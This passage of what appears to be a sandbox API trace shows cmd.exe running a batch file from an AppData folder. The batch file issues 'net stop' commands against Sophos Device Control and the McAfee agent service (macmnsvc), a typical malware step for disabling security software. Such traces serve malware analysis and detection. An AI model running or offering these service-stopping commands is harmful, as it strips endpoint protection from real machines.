_String2="Program", _MaxCount=0x7) returned -13 [0037.378] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.378] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0037.378] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0037.378] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0037.378] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0037.378] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0037.378] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0037.378] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0037.378] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.378] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0037.378] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0037.378] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0037.378] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0037.378] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0037.378] GetProcessHeap () returned 0x3e0000 [0037.378] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0037.378] GetProcessHeap () returned 0x3e0000 [0037.378] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xa) returned 0x3f6a70 [0037.378] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0037.378] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ΓÇ£Sophos Device Control ServiceΓÇ¥ /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ΓÇ£Sophos Device Control ServiceΓÇ¥ /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ΓÇ£Sophos Device Control ServiceΓÇ¥ /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xb44, dwThreadId=0xb48)) returned 1 [0037.382] CloseHandle (hObject=0x78) returned 1 [0037.382] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0037.382] GetProcessHeap () returned 0x3e0000 [0037.382] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0037.382] GetEnvironmentStringsW () returned 0x3f8408* [0037.382] GetProcessHeap () returned 0x3e0000 [0037.382] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0037.382] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0037.382] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0037.536] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x1) returned 1 [0037.536] CloseHandle (hObject=0x74) returned 1 [0037.536] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000001") returned 8 [0037.536] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0037.536] GetProcessHeap () returned 0x3e0000 [0037.536] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0037.536] GetEnvironmentStringsW () returned 0x3f8408* [0037.536] GetProcessHeap () returned 0x3e0000 [0037.536] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0037.537] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0037.537] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0037.537] GetProcessHeap () returned 0x3e0000 [0037.537] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0037.537] GetEnvironmentStringsW () returned 0x3f8408* [0037.537] GetProcessHeap () returned 0x3e0000 [0037.537] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0037.537] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0037.537] GetProcessHeap () returned 0x3e0000 [0037.537] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0037.537] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0037.537] _get_osfhandle (_FileHandle=1) returned 0x264 [0037.537] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0037.537] _get_osfhandle (_FileHandle=1) returned 0x264 [0037.537] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0037.537] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0037.537] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0037.537] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0037.537] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0037.538] SetConsoleInputExeNameW () returned 0x1 [0037.538] GetConsoleOutputCP () returned 0x1b5 [0037.538] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0037.538] SetThreadUILanguage (LangId=0x0) returned 0x409 [0037.538] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0037.538] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0037.538] _get_osfhandle (_FileHandle=3) returned 0x74 [0037.538] SetFilePointer (in: hFile=0x74, lDistanceToMove=988, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0037.538] GetProcessHeap () returned 0x3e0000 [0037.538] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7500 | out: hHeap=0x3e0000) returned 1 [0037.538] GetProcessHeap () returned 0x3e0000 [0037.538] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f73d0 | out: hHeap=0x3e0000) returned 1 [0037.538] GetProcessHeap () returned 0x3e0000 [0037.538] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f72a8 | out: hHeap=0x3e0000) returned 1 [0037.538] GetProcessHeap () returned 0x3e0000 [0037.538] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7240 | out: hHeap=0x3e0000) returned 1 [0037.538] GetProcessHeap () returned 0x3e0000 [0037.538] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f71c8 | out: hHeap=0x3e0000) returned 1 [0037.538] GetProcessHeap () returned 0x3e0000 [0037.538] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6fb0 | out: hHeap=0x3e0000) returned 1 [0037.538] GetProcessHeap () returned 0x3e0000 [0037.539] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0037.539] GetProcessHeap () returned 0x3e0000 [0037.539] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e80 | out: hHeap=0x3e0000) returned 1 [0037.539] GetProcessHeap () returned 0x3e0000 [0037.539] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0037.539] GetProcessHeap () returned 0x3e0000 [0037.539] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0037.539] GetProcessHeap () returned 0x3e0000 [0037.539] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0037.539] GetProcessHeap () returned 0x3e0000 [0037.539] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0037.539] GetProcessHeap () returned 0x3e0000 [0037.539] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0037.539] _get_osfhandle (_FileHandle=3) returned 0x74 [0037.539] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3dc [0037.539] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x14e5, lpOverlapped=0x0) returned 1 [0037.539] SetFilePointer (in: hFile=0x74, lDistanceToMove=1010, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f2 [0037.539] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=22, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop macmnsvc /y\r\nice Control ServiceΓÇ¥ /y\r\nfailures\r\nnded\r\n") returned 22 [0037.539] _get_osfhandle (_FileHandle=3) returned 0x74 [0037.539] GetFileType (hFile=0x74) returned 0x1 [0037.539] _get_osfhandle (_FileHandle=3) returned 0x74 [0037.539] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f2 [0037.539] GetProcessHeap () returned 0x3e0000 [0037.539] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fbad8 [0037.539] GetProcessHeap () returned 0x3e0000 [0037.539] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fbad8 | out: hHeap=0x3e0000) returned 1 [0037.539] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x58) returned 0x3f3f90 [0037.539] GetProcessHeap () returned 0x3e0000 [0037.539] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x10) returned 0x3f6a58 [0037.540] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x2c) returned 0x3e1290 [0037.540] _tell (_FileHandle=3) returned 1010 [0037.540] _close (_FileHandle=3) returned 0 [0037.540] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0037.540] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0037.540] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0037.540] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0037.540] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0037.540] _wcsicmp (_String1="net", _String2="CD") returned 11 [0037.540] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0037.540] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0037.540] _wcsicmp (_String1="net", _String2="REN") returned -4 [0037.540] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0037.540] _wcsicmp (_String1="net", _String2="SET") returned -5 [0037.540] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0037.540] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0037.540] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0037.540] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0037.540] _wcsicmp (_String1="net", _String2="MD") returned 1 [0037.540] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0037.540] _wcsicmp (_String1="net", _String2="RD") returned -4 [0037.541] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0037.541] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0037.541] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0037.541] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0037.541] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0037.541] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0037.541] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0037.541] _wcsicmp (_String1="net", _String2="VER") returned -8 [0037.541] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0037.541] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0037.541] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0037.541] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0037.541] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0037.541] _wcsicmp (_String1="net", _String2="START") returned -5 [0037.541] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0037.541] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0037.541] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0037.541] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0037.541] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0037.541] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0037.541] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0037.541] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0037.541] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0037.541] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0037.541] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f6cf0 [0037.541] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0037.541] SetErrorMode (uMode=0x0) returned 0x1 [0037.541] GetProcessHeap () returned 0x3e0000 [0037.541] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0037.541] GetProcessHeap () returned 0x3e0000 [0037.541] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0037.541] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0037.541] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0037.542] GetProcessHeap () returned 0x3e0000 [0037.542] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6d58 [0037.542] GetProcessHeap () returned 0x3e0000 [0037.542] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6e80 [0037.542] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e80, Size=0x122) returned 0x3f6e80 [0037.542] GetProcessHeap () returned 0x3e0000 [0037.542] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e80) returned 0x122 [0037.542] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0037.542] GetProcessHeap () returned 0x3e0000 [0037.542] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0037.542] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0037.542] GetProcessHeap () returned 0x3e0000 [0037.542] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0037.542] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.542] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0037.542] GetLastError () returned 0x2 [0037.542] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0037.542] GetLastError () returned 0x2 [0037.542] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.542] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0037.542] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0037.543] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0037.543] GetLastError () returned 0x2 [0037.543] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0037.543] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0037.543] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0037.543] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0037.543] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0037.543] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x210) returned 0x3f6fb0 [0037.543] GetProcessHeap () returned 0x3e0000 [0037.543] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x34) returned 0x3f8278 [0037.543] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x418) returned 0x3f71c8 [0037.543] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f71d0, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0037.543] SetErrorMode (uMode=0x0) returned 0x1 [0037.544] GetProcessHeap () returned 0x3e0000 [0037.544] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f71c8, Size=0x5c) returned 0x3f71c8 [0037.544] GetProcessHeap () returned 0x3e0000 [0037.544] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f71c8) returned 0x5c [0037.544] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0037.544] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0037.544] GetProcessHeap () returned 0x3e0000 [0037.544] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f7230 [0037.544] GetProcessHeap () returned 0x3e0000 [0037.544] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7358 [0037.544] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7358, Size=0x122) returned 0x3f7358 [0037.544] GetProcessHeap () returned 0x3e0000 [0037.544] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7358) returned 0x122 [0037.544] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0037.544] GetProcessHeap () returned 0x3e0000 [0037.544] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7488 [0037.544] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7488, Size=0x76) returned 0x3f7488 [0037.544] GetProcessHeap () returned 0x3e0000 [0037.544] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7488) returned 0x76 [0037.544] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.544] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0037.544] GetLastError () returned 0x2 [0037.544] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0037.544] GetLastError () returned 0x2 [0037.544] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0037.545] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0037.545] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0037.545] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0037.545] GetLastError () returned 0x2 [0037.545] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0037.545] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0037.545] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0037.545] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0037.545] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0037.545] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0037.545] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0037.545] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0037.545] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x18) returned 0x3f82b8 [0037.545] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0037.545] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0037.545] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0037.545] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0037.546] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 